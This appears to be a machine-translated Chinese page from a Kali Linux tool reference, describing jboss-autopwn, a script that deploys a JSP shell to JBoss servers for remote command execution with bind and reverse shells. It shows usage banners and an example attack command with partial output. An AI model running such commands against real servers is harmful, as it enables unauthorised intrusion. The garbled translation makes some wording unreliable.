的jboss-autopwn包装说明
这JBoss的脚本部署一个JSP壳目标的JBoss AS服务器上。一旦部署完成,该脚本用自己的上传和命令执行能力提供一个交互式会话。 其特点包括:
- 跨平台支持 - 在Windows,Linux和Mac目标测试
- 支持绑定和反向绑定弹
- Meterpreter就会弹和Windows目标的VNC支持 资料来源:https://github.com/SpiderLabs/jboss-autopwn
的jboss-autopwn首页 | 卡利的jboss-autopwn回购
- 作者:基督教G. Papathanasiou,Trustwave控股公司
- 许可:GPL第二版
0x01 包含在jboss-autopwn封装工具
JBoss的双赢 - 的JBoss的Windows autopwn:~# jboss-win [!] JBoss Windows autopwn [!] Usage: ./e2.sh server port [!] Christian Papathanasiou [!] Trustwave SpiderLabs
0x02 JBoss的Linux的 - JBoss的* nix的autopwn
:~# jboss-linux [!] JBoss *nix autopwn [!] Usage: ./e.sh server port [!] Christian Papathanasiou [!] Trustwave SpiderLabs
0x03 的jboss-autopwn用法示例
攻击指定的端口 (8080) 上的目标服务器 (192.168.1.200), 重定向标准错误 (2>的/ dev / null的):
:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file:
原文来自https://www.hackfun.org/kali-tools/jboss-autopwn_zh.html。转载请注明原出处,商用请联系原作者授权。